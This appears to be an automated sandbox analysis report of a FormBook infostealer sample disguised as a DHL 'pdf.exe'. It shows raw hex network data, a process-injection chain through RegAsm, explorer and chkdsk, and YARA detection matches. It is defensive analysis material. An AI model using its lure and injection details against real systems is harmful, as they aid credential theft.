2021-09-27 18:36:57 UTC	373	IN	Data Raw: 28 d4 81 53 b1 51 53 89 0f d5 ce 1b 0c d5 8a 37 69 59 3c 5c f0 bc d0 4b f0 ec b1 7c c7 ea 02 b3 b8 7f 0d 0f 32 53 1b 5b 9b de 33 45 cd 8e dd 71 2e 2e e3 77 89 d6 aa 1e f5 53 a2 91 91 50 76 c7 c4 90 19 38 07 87 cd fa be 2e ee 10 0d d2 68 9e e4 aa df ee bb 96 bd 57 63 3c a9 56 75 82 c3 a6 c4 13 f1 bc 69 a6 bf 68 80 21 72 3b 1d 4f 74 82 69 42 95 65 cf 65 cb 52 9d bf 54 ac fb d1 85 8f b5 b9 4f 49 fd 78 41 fb a3 a4 f9 b2 53 fa 4e f9 e9 90 a7 ea e1 d4 c3 97 a4 34 21 90 01 e7 66 d3 f4 82 58 18 89 c3 7d 41 0b 43 7b a2 5a bd ee 2d ce 0d d4 a4 a6 b0 8f 82 b6 47 fc a6 3a 8c bf 25 fb 84 f3 87 06 a7 15 4f 34 54 4f f6 e9 95 ee ac 07 93 9d 33 cc 3a cd 84 c3 1a 77 5d 7b 5b 89 32 3e 30 a7 01 41 dc 44 ee 3c 67 0a 6f 3a 8e 3b af 10 89 6a 2e f7 e0 ac 01 bf aa f8 3d 8f b7 27 Data Ascii: (SQS7iY<\K\|2S[3Eq..wSPv8.hWc<Vuih!r;OtiBeeRTOIxASN4!fX}AC{Z-G:%O4TO3:w]{[2>0AD<go:;j.='
2021-09-27 18:36:57 UTC	377	IN	Data Raw: 16 aa b7 73 27 5b 6f 97 64 a5 b5 a4 16 b6 27 35 76 4a e7 2f 20 c1 76 55 de 7c f8 2e 17 53 0c 70 ce d1 33 86 13 c9 1a f7 15 db 48 16 e2 99 58 cc 8d 46 0f 4a 58 5a 76 d5 b9 3c 2f b9 21 2e 08 a3 20 1a 85 ff 57 b2 41 b4 55 e7 5f f7 b1 12 27 a3 08 f3 e9 b4 7a d2 d1 e1 5b 30 de 21 94 7d 4f 77 ca 78 84 a3 34 b6 09 89 be 10 49 f7 1f 1d 47 85 ee aa 8f 48 83 a0 65 5b 97 fe c6 6e e9 65 03 1a 31 40 99 c8 9b c3 f2 b3 8b 06 8d ff f3 06 ea a0 86 67 a6 b6 8e a4 3b 6e 2f 35 d5 a1 92 75 bb 73 f2 cd f8 61 3a df a8 66 96 33 6f 79 60 f5 3c 47 a6 0e 90 a8 ef 89 e6 97 6d b3 17 4e a6 fb f6 d1 f4 e9 b6 43 c9 52 78 42 6e a5 6a 3f 7e 7f 69 73 e7 b9 0e f4 1d 6d b7 19 bd 3b 12 9d 62 bc b4 4a 90 1c 90 99 b7 e0 2e ba 50 03 2f 3d d2 11 98 35 e3 e4 06 1e e4 64 97 7e 8a 95 8d c9 db 37 47 Data Ascii: s'[od'5vJ/ vU\|.Sp3HXFJXZv</!. WAU_'z[0!}Owx4IGHe[ne1@g;n/5usa:f3oy`<GmNCRxBnj?~ism;bJ.P/=5d~7G
2021-09-27 18:36:57 UTC	393	IN	Data Raw: 79 f5 17 30 3d f3 35 74 60 e4 83 2c df fa d7 c9 75 87 ca db 37 0f 28 97 27 30 cc e0 fc 4f b9 77 7b c6 b9 46 81 bb 30 5d 83 0f 79 17 4d a5 f5 d1 e4 af 9a a7 7c 9c e0 b0 86 3a 3e 9a 14 e4 45 48 03 44 4d ef d5 5b a8 d3 42 fe 66 55 e6 3c 37 76 20 95 93 4b d8 2b 27 9b 2c fc fe 3f 7f 64 8c 36 b6 a6 c2 d4 30 0c 35 1e f8 cb 52 aa f8 e3 7e 80 43 41 1c 1e 52 c1 f4 18 4e ca 0e 17 9c d6 d0 0a ba 1a d2 6a 71 1f 07 a7 50 eb 11 fc c3 93 09 63 6f d4 a7 61 47 81 d3 65 76 69 94 c1 ae 54 54 35 fe a2 a9 e3 59 d1 5f 61 2b de cb c8 cc 5c c0 87 c6 61 96 da 32 f4 61 2a 03 b0 ef da 90 4f 38 67 bc 4a f1 7f f6 2c 23 79 89 d3 76 4e c6 fa 7d 3b 43 57 80 fe 3b 96 1e a1 64 2e f1 1d 73 ac 03 c7 8e 75 0b 97 29 8b bc 67 44 2d bf 22 52 64 c1 4e c3 85 78 4d e6 be 01 aa 12 ce b0 ff 53 a4 35 Data Ascii: y0=5t`,u7('0Ow{F0]yM\|:>EHDM[BfU<7v K+',?d605R~CARNjqPcoaGeviTT5Y_a+\a2a*O8gJ,#yvN};CW;d.su)gD-"RdNxMS5
2021-09-27 18:36:57 UTC	405	IN	Data Raw: 1d 5b a4 3e 38 0f 4b 4e c3 07 cd 71 d7 b6 4a 50 0c df 3b fa 35 c9 37 e8 39 d5 32 de 17 13 a6 7b a4 6f a0 8a 67 8c c6 ff c8 ee df c2 fc 40 7f 8a f9 a5 ac 85 e3 e0 2d c1 4f cf b7 cd 97 f7 e6 25 fc 09 06 e5 35 9e 91 43 3d 72 2c a2 96 cb 39 f7 f6 e3 ab 3e c7 bd 70 e6 d9 32 3e fd 0e ab 2f e5 5a 22 43 68 c7 df 91 2d 04 f6 7f 13 50 1b 2b 62 63 66 ea 4d ac 17 c2 c7 56 a4 ff bd 88 d8 69 79 ce 60 ad b4 21 60 e1 5c 74 8e 9a 51 e2 10 fa 3f c0 06 a9 29 12 1b 43 20 a0 e6 e7 15 b3 df 1c 39 c6 f4 d5 3c 45 2f 69 17 9f 2b 8a 24 9b c3 aa 92 3c 25 b9 f9 98 f4 5f 48 2a 0a 36 84 cc fc f7 87 c5 86 0b 4e 5b 72 ce 9b 07 79 12 d8 c0 96 28 8f c6 51 a7 56 b6 b0 65 aa 97 ca a3 df ce 2e 10 9d 7e bd 60 1a 37 3c e4 67 d8 42 68 2c 4f 1e 06 b3 8d 2e 39 bd 9b dd 62 7b 84 81 ff 55 07 fc 62 Data Ascii: [>8KNqJP;5792{og@-O%5C=r,9>p2>/Z"Ch-P+bcfMViy`!`\tQ?)C 9<E/i+$<%_H*6N[ry(QVe.~`7<gBh,O.9b{Ub
2021-09-27 18:36:57 UTC	421	IN	Data Raw: e7 07 63 c6 19 e8 51 ba 7f e4 b9 3f ba b9 75 5c a9 86 72 e7 4b 8b f7 1d 8a 88 55 3e c4 fb 22 ad 83 c3 55 f8 cc 82 74 28 0f fa 88 1a 8b be 91 e9 c3 9b a1 6a c2 14 d4 f1 5e 41 22 82 9b 2c 2f d7 c0 e4 d3 40 ed fc 24 fa 4e 89 94 08 27 3c 32 80 07 4e 95 3e 17 79 5a c9 61 72 6e 3a 01 12 d4 5b 71 1f 6d 5b 44 8e 4c e8 a3 92 ea 7a bb 0e 39 61 05 0a 95 ad ab 2a ba a1 6b 42 30 10 93 45 7f 50 1d cc a2 f6 bb 39 47 fe f2 50 b6 49 a2 41 0b 34 b5 cf 63 b1 80 40 9f b2 07 ec cc ac a8 86 95 9d 3d a7 8c 0a 47 5d bb 44 40 da 4d 07 34 c1 dc 1e 93 0b eb 18 a2 0d f2 a6 69 8b c0 6e 30 c9 c5 ec 66 5e 4d 4a b2 69 a0 dd bf 98 6c e9 80 5f 48 f6 70 14 4c 25 69 d1 24 9e da ef 43 3d 89 44 68 71 68 26 b9 eb c8 c5 b4 87 08 b1 db 1b f3 af 48 62 71 0c 0e b3 3e 01 fc 69 b0 a1 82 89 66 60 04 Data Ascii: cQ?u\rKU>"Ut(j^A",/@$N'<2N>yZarn:[qm[DLz9a*kB0EP9GPIA4c@=G]D@M4in0f^MJil_HpL%i$C=Dhqh&Hbq>if`
2021-09-27 18:36:57 UTC	437	IN	Data Raw: d6 c0 51 e2 59 0e b6 f0 75 12 ed 80 8c ef aa 23 ab 34 7f 7b 64 76 cc 5e 60 94 eb 6c 56 1a d0 d8 03 c0 5f f4 74 5f 53 3e 94 11 e7 a8 d1 44 58 83 d4 86 c1 36 d8 de 70 4d ca 75 9f 30 6d 98 cd 7a f3 33 78 cf f3 47 ec 9b 85 03 93 25 2e 4a cc da 77 ea ae b2 5b b1 49 df a0 00 42 8a 97 e1 48 f1 79 b5 55 67 5b dd bd 66 c1 ff a4 00 8b 1e f1 7b db 5b 97 77 c6 85 fd 7e 2d e6 de 9a d5 f3 b5 0f 85 a6 67 89 15 6b 1d 10 c9 70 d9 5c 68 2d 42 05 40 b2 a7 0e 37 c6 c9 2c 4f 95 13 e0 9d 5e fe 7e a4 ab 1f 63 79 40 51 7d b8 ea bd bc 60 c8 98 43 e5 1f a6 86 fd f0 79 39 be 6a f9 ed 45 ff 11 68 84 3f 78 ff b7 90 79 d5 0b 26 cf c7 ae b7 e3 0a 17 ca 22 12 6e a3 e2 b7 f1 ba 8e 11 5f 79 87 77 70 89 c4 16 3d e5 cb 54 7b 23 d2 05 a6 7d c3 00 0f 91 e7 85 84 0b 44 69 ed f9 9d ef a6 8c 40 Data Ascii: QYu#4{dv^`lV_t_S>DX6pMu0mz3xG%.Jw[IBHyUg[f{[w~-gkp\h-B@7,O^~cy@Q}`Cy9jEh?xy&"n_ywp=T{#}Di@
2021-09-27 18:36:57 UTC	453	IN	Data Raw: 73 37 22 d2 83 28 93 41 c7 2d 55 48 4e 11 dc 26 fd df ce 49 c5 ff 12 c7 db c7 5e cb 3b e0 ed d9 66 34 db 7f 10 10 93 10 db 0d 44 3f 0e 61 46 05 d9 49 8d 33 38 68 79 5b d8 ef ef 7d ed 03 22 f9 a2 95 2c 0d 1a 08 b0 8f 2d 10 55 1e 2f eb c9 53 07 b1 35 6e 7e 74 35 8e a3 6a ec 4d ac be aa 9d a4 06 00 e9 2e b6 8d e6 11 7f 90 19 30 6b d6 21 5c 83 f6 6a 54 69 87 6b 20 61 e5 d6 5e 2e b7 0d 72 fe 78 79 18 20 11 a1 2c 46 b4 f5 4f 59 72 5f f7 88 c9 19 09 e9 00 13 7d c0 a6 15 9b e5 75 89 18 5b af 04 f5 f4 4a be d4 83 f5 dc 87 09 75 a8 f3 fa 79 b3 8f 2a ab d3 06 10 f4 c9 dd 21 ec f8 97 b6 9e 75 12 f7 6f ff ab 5a 93 d3 cd e9 0a 06 2b 51 b9 ea 42 e5 f7 65 ce 8b a8 07 19 de fc 6a 0b 8d 4a 1b 43 bc 47 31 3d 4e 0a c4 49 54 a6 f9 56 7a 8b 24 d7 93 98 b1 10 e3 09 59 71 85 4d Data Ascii: s7"(A-UHN&I^;f4D?aFI38hy[}",-U/S5n~t5jM.0k!\jTik a^.rxy ,FOYr_}u[Juy*!uoZ+QBejJCG1=NITVz$YqM
2021-09-27 18:36:57 UTC	469	IN	Data Raw: cd ad d0 ae 51 da 9f 5a c2 60 b4 b1 40 3d 7f 56 7e 7a b2 c3 27 2f b1 c6 99 e3 55 84 74 4f f9 66 17 3c d8 98 92 90 d9 b5 8e 4e 00 c5 69 b3 c1 21 de 33 93 dd 2d 3b de 9d 31 bb 78 54 9b b5 dc 0e 72 cb 56 7a 1c 02 aa f6 ea 15 7d f2 80 d8 6f 0a 64 ab 29 1a 18 69 1a 0e 6b ad c9 cc 6c a7 19 68 b3 59 7b b3 74 08 2c af 76 3c 18 23 47 b2 b5 62 10 3c 7f 89 a1 4b 3a 25 cf fe dd 4e 91 f8 0b 8f a1 cd 62 02 bb de 14 ef 83 e6 9b 87 5c d4 cb 8b ca 68 23 e9 f2 c6 c9 4c ff 7b bd db ed 6a 97 61 5d b3 b7 59 b3 05 4f f2 d4 15 91 31 74 33 04 d9 9b cd 0c 49 f3 b4 6c 35 0d a8 97 7a 07 e7 a5 6a 2d b8 1f 20 15 a9 f8 75 55 67 01 e7 b5 3b 00 00 22 31 d8 49 a7 ab b7 86 92 83 bf dd cf 3e c5 c9 4d 0e e8 ad 25 8b 07 41 80 4c 11 2e 6d a7 2d ab ec 83 7c 78 9c 89 01 81 7b a4 25 1c 3b 70 b3 Data Ascii: QZ`@=V~z'/UtOf<Ni!3-;1xTrVz}od)iklhY{t,v<#Gb<K:%Nb\h#L{ja]YO1t3Il5zj- uUg;"1I>M%AL.m-\|x{%;p
2021-09-27 18:36:57 UTC	485	IN	Data Raw: d1 a6 98 f0 1b 82 5d 10 77 00 96 e2 34 50 13 30 16 a9 68 2b 04 2d 6b c6 20 07 ba f9 18 86 0f e8 c0 a8 19 c0 25 39 17 0d c5 f0 53 a5 0b d7 93 f8 85 58 de 16 41 99 3d dc 32 53 75 f4 29 d5 ca 95 d7 89 c9 9d c9 d9 70 b2 72 22 09 3a db 98 cf 0d 01 ad 55 b2 e4 a7 8f ad 77 82 08 7d 93 9b 56 c3 36 ba d4 b1 e1 be 03 3e 79 ff ae be 7d 9f 98 d0 50 5a 26 87 39 8d 75 e1 3e 3b d3 eb 5a e9 a2 2b 20 29 0a 8c 5c 19 d7 3b 0c fe 1b eb 16 07 3e 86 70 d4 ba cc 81 a1 be bf d2 7e 11 45 7d 3b 00 05 a6 73 30 08 71 69 e0 c8 9a b9 7d 92 25 b3 75 03 ce c8 57 e3 17 0b 44 ac 71 99 75 ec 9b 87 9c 1d 3e f6 a4 47 99 2b 8a 6d 4d fb 20 57 74 a2 fe f8 52 76 32 99 3d 45 a6 81 d4 31 46 ee 2d ba ef d1 27 ff 58 06 34 29 9d 06 a2 aa ef 83 a5 b0 73 6e ce c7 b1 8a 4b 21 e6 16 d8 15 47 94 7a f0 45 Data Ascii: ]w4P0h+-k %9SXA=2Su)pr":Uw}V6>y}PZ&9u>;Z+ )\;>p~E};s0qi}%uWDqu>G+mM WtRv2=E1F-'X4)snK!GzE
2021-09-27 18:36:57 UTC	501	IN	Data Raw: f6 22 68 70 ff c8 8c c8 08 8b 53 57 e0 aa 59 ba f0 7e db 74 ba 56 86 64 a1 b6 d7 a7 1c 76 6c 8d 7d 66 3d b5 c3 f5 16 6e 6b c3 4e c8 c2 92 fb e3 45 1a f5 06 2c 78 db 36 f1 6b 5d ad 03 c1 7d fe 83 86 87 ae 8e a8 a0 99 54 a8 a5 7e 60 e0 ef 8e c1 9c 01 be fa 42 9e 9c 3a 1c f9 cb 35 0f 0c 5a 37 6f 6b ba 64 d0 68 3d 7d cc d5 5d 0b 70 ad 07 53 d0 bd 6e 9f 33 49 90 55 e0 fd a4 44 02 09 dc 74 e0 01 62 c8 ae 42 08 98 f2 21 04 6e 54 a1 b7 43 54 e6 ee 44 2d a5 50 e7 77 9c f4 73 0d d5 5e 81 49 f5 7b 69 4a 93 88 9d 77 e0 3b 7a 41 89 33 d4 98 96 61 c9 86 c5 1c 4b c1 bd 7b 49 9a 70 a9 ae ac ec f3 82 fb 01 cd 5d c4 88 0a db d0 fb 2c 13 33 f0 58 75 2f af 29 84 07 73 07 6f 6a 18 25 e0 dc 3f 4f a3 a4 3b fb b7 91 03 0c e0 73 a9 d4 b1 5d 8b ba 58 b5 44 0d 01 0a 50 de 11 c3 72 Data Ascii: "hpSWY~tVdvl}f=nkNE,x6k]}T~`B:5Z7okdh=}]pSn3IUDtbB!nTCTD-Pws^I{iJw;zA3aK{Ip],3Xu/)soj%?O;s]XDPr
2021-09-27 18:36:57 UTC	517	IN	Data Raw: 8b a3 d7 0c 38 47 8d f5 f0 8f 06 0c a3 16 cb b4 60 6f dd 92 95 0d a4 73 57 ec 4a 16 d7 7e 71 36 36 d1 f0 61 9c 7b 46 56 5c ff 53 ad 32 c0 f4 fd cb ad 2b da 12 0b 2c 18 57 ff 34 c3 97 e3 e6 3f 1c 3b fa 49 88 f3 24 96 2c 48 d9 4c 38 1d 33 35 ff 93 a9 95 16 b3 0e 61 aa b0 d4 36 3a 57 fb 8c 5e ab f0 a6 52 7a 35 a2 df 31 47 01 4c b9 44 0b e4 51 75 a7 75 ac e5 59 33 70 13 8d 60 92 52 8a 59 88 e6 ad cb 6e 9b 5f 07 84 4e 66 44 2d 52 21 a2 35 ee 2c 1d 1a 3a 89 c5 d0 01 05 c2 2a c1 47 ac 29 4a c5 0e ff 60 29 00 25 c6 d7 80 90 f5 b0 ec cc cd 3a cc f5 7c 76 5a 9e cb c6 8b 11 b1 f2 66 83 04 82 01 a0 80 96 4d ca 0e 23 6e 4a bd 71 35 61 95 bf 04 b9 67 41 e5 58 ae a3 03 ec b5 80 03 97 29 d5 4c 41 2e 87 15 e5 5e a9 3d cb fe 16 08 44 2b 83 c0 f5 73 24 d9 03 94 da f2 08 95 Data Ascii: 8G`osWJ~q66a{FV\S2+,W4?;I$,HL835a6:W^Rz51GLDQuuY3p`RYn_NfD-R!5,:*G)J`)%:\|vZfM#nJq5agAX)LA.^=D+s$
2021-09-27 18:36:57 UTC	533	IN	Data Raw: 8a 8b db 6b b1 e0 c4 5d f4 9c a9 1a c9 e5 7d 74 1f 5c 40 f5 c7 74 5d a8 93 09 dd c5 33 89 61 2d 18 ae e9 90 02 4d c5 aa a2 0b 79 5d 5f 11 e6 b4 d5 e1 e0 9b 96 23 4e b8 51 9d 22 bb 55 aa 61 0f 9c 1c 94 75 65 99 7a f4 bc 70 f2 76 5c 67 ed ef 66 46 41 49 ed 01 bf e1 a9 ef 71 d7 5f a1 3b e1 a1 ed 0e cd 66 d7 b2 f5 73 87 70 e6 f0 93 63 f9 96 ce 0b b1 ee 35 bc 72 84 57 d0 14 98 67 34 d4 ed a3 fa 40 b9 5f e5 36 93 b3 03 0f 07 76 5f ec 15 0c 57 b1 38 d1 24 af cc 46 85 bf f2 0a 6a 94 f0 e2 57 64 85 37 95 42 bc 48 af 86 f4 c2 6d 0f 19 9e 0e 82 64 3b 30 4b 74 8d b4 06 19 4b 71 c0 d5 69 09 a9 82 a5 53 6d f8 03 8a 1a e3 41 de 9b e3 00 ec f8 fe 4b c2 84 04 cf 85 14 4f 5a 90 c7 95 dd 4f 23 f9 f8 d4 fa 84 54 c2 9c 63 84 60 21 67 29 00 5c ed 19 1e 7d 65 0b 79 9d 6b 9f 2c Data Ascii: k]}t\@t]3a-My]_#NQ"Uauezpv\gfFAIq_;fspc5rWg4@_6v_W8$FjWd7BHmd;0KtKqiSmAKOZO#Tc`!g)\}eyk,
2021-09-27 18:36:57 UTC	549	IN	Data Raw: a7 a9 75 31 b9 9a 6b 34 50 3c 01 bd b4 35 af cf 6a 46 c6 3e d4 95 47 15 29 ff 7f 73 8f c6 49 86 fb c2 1f 2a 34 65 b6 93 a3 d2 f0 56 88 f4 56 fb be c2 1a d6 bd 7f 55 97 39 44 1e 5e 92 cc 73 ad 00 51 52 aa 8e 75 dc 2b c2 be 61 9e 9f d9 68 bd 44 2a 01 f2 ef 5d a6 cb 9c 9f e2 55 bd fd 07 50 00 dd a4 d1 5f ce b7 cc 21 06 1c 28 ba 02 79 33 c4 1b c6 c2 51 fc 13 bf 99 02 16 4d 9d c9 c1 a9 ff 99 0f 67 c6 5e da 73 55 9d c2 39 e5 28 45 a8 88 6d 23 d5 c1 cb 62 77 00 65 f9 8b e2 5c d0 d6 2c ab 3f 4c 81 b1 8e 18 16 83 d1 4c 38 e4 2d fc d8 d6 19 60 b4 03 2f 7f f9 f3 e5 28 21 8f 46 6e a5 43 df 3e ab 7f c8 82 0c b9 41 1b 85 d0 29 e6 c5 0c ea 14 7c 57 ed ff f2 9c cf 56 81 77 c1 e5 85 0f 29 62 6a 27 03 80 e2 c0 31 ed 7f b0 be 61 36 a5 f0 0e 0a d5 49 55 a5 e1 9b 02 89 6b 7f Data Ascii: u1k4P<5jF>G)sI4eVVU9D^sQRu+ahD]UP_!(y3QMg^sU9(Em#bwe\,?LL8-`/(!FnC>A)\|WVw)bj'1a6IUk
2021-09-27 18:36:57 UTC	565	IN	Data Raw: 42 42 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff 42 42 42 ff 42 42 42 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff 42 42 42 ff 42 42 42 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff 42 42 42 ff 42 42 42 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff f1 ef f0 ff 42 42 42 ff Data Ascii: BBBBBBBBBBBBBBBBBBBBBBB

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: DHL AWB# 4AB19037XXX.pdf.exe PID: 4532 Parent PID: 6496

General

Start time:	20:36:53
Start date:	27/09/2021
Path:	C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\Desktop\DHL AWB# 4AB19037XXX.pdf.exe'
Imagebase:	0xbc0000
File size:	11776 bytes
MD5 hash:	690684B6B6A432EF5F8B34B67653D4BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.316889337.0000000012EA1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.316858446.0000000012E81000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.317171269.0000000012F2A000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Analysis Process: conhost.exe PID: 1376 Parent PID: 4532

General

Start time:	20:36:54
Start date:	27/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: RegAsm.exe PID: 3672 Parent PID: 4532

General

Start time:	20:37:04
Start date:	27/09/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase:	0x900000
File size:	64616 bytes
MD5 hash:	6FD7592411112729BF6B1F2F6C34899F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.415260668.0000000000E40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.414822084.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.415181515.0000000000E10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: explorer.exe PID: 3352 Parent PID: 3672

General

Start time:	20:37:06
Start date:	27/09/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff720ea0000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.370457734.000000000FF10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.348673318.000000000FF10000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: autoconv.exe PID: 5456 Parent PID: 3352

General

Start time:	20:37:35
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\autoconv.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\SysWOW64\autoconv.exe
Imagebase:	0xd10000
File size:	851968 bytes
MD5 hash:	4506BE56787EDCD771A351C10B5AE3B7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: chkdsk.exe PID: 5788 Parent PID: 3672

General

Start time:	20:37:51
Start date:	27/09/2021
Path:	C:\Windows\SysWOW64\chkdsk.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\chkdsk.exe
Imagebase:	0x2b0000
File size:	23040 bytes
MD5 hash:	2D5A2497CB57C374B3AE3080FF9186FB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.558749147.0000000000440000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.560917068.0000000004E90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.561542359.0000000004F90000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

